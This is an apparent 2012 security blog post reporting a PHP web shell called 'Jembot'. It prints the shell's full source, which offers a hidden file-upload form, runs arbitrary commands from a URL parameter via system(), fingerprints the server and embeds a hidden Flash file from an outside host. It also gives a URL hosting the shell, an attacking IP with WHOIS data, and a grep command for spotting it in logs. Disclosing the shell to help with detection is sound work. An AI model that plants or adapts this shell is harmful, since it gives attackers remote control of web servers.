вторник, 17 апреля 2012 г.

Find new web bot [Jembot]

We have discovered a new kind of bot that spreads in the form of web shells, called Jembot.
Source code:

<?php
if(isset($_GET['jembot']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>empixcrew technology</h2><hr>";
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
</form>";
if ($_FILES["file"]["error"] > 0)
  {
  echo "gagal: " . $_FILES["file"]["error"] . "<br />";
  }
else
  {
  echo "sukses: " . $_FILES["file"]["name"] . "<br />";
  echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  echo "mentah: " . $_FILES["file"]["tmp_name"];
  }
if (file_exists("" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " wes enek cok. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "" . $_FILES["file"]["name"]);
      echo " mateng: " . "" . $_FILES["file"]["name"];
echo"<hr>";
      }
  }
elseif ($_GET["empix"]){
system($_GET["empix"]);
}
else {
$un = php_uname();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
echo "empixcrew: $un $php1 :empixcrew";
}
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT> 
Location of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell
.php

Attacks coming from IP 187.17.65.242 Brasil

WHOIS:
inetnum: 187.17.64/18 aut-num: AS15201 abuse-c: SEO50 owner: Universo Online S.A. ownerid: 001.109.184/0001-95 responsible: Contato da Entidade UOL country: BR owner-c: CAU12 tech-c: CAU12 inetrev: 187.17.64/20 nserver: ns1.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 nserver: ns2.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 created: 20081022 changed: 20081022 
nic-hdl-br: CAU12 person: Contato Administrativo - UOL e-mail: l-registrobr-uol@corp.uol.com.br created: 20031202 changed: 20100106 
nic-hdl-br: SEO50 person: Security Office e-mail: security@uol.com.br created: 20021114 changed: 20110830 
We strongly recommend to block this ip address and run the following command to detect attacks:
#egrep -n --color "hell.php" *.log